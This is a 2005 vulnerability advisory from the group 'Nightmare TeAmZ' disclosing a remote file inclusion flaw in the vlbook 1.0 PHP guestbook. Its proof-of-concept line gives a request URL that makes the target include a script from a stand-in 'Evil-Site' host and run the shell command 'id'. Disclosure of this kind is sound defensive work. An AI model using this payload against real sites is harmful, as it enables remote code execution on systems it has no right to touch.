------------------------------------------------------
Nightmare TeAmZ Advisory 005
------------------------------------------------------
Date - 10/2005
vlbook Remote File Inclusion


AFFECTED PRODUCTS
=================
vlbook 1.0 Guestbook
http://vlbook.com/


OVERVIEW
========
he vlbook is a free, open source and light-weight guestbook written in PHP 
using flat files to store

messages and settings. It comes with install script for quick and effortless 
installation.


DETAILS
=======

1. Remote File Inclusion


POC
===

1.
------
Remote File Inclusion

Exemple
--------
1. Remote File Inclusion

Vulnerable Path:

/index.php?user=

Exemple:

www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=http://www.[Evil-Site.org/cmd.php?&cmd=id


Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk, Advisory by Sub_Z3r0 of Nightmare TeAmZ,

Site: http://www.NightmareTeAmZ.altervista.org

_________________________________________________________________
Blocca le pop-up pubblicitarie con MSN Toolbar! http://toolbar.msn.it/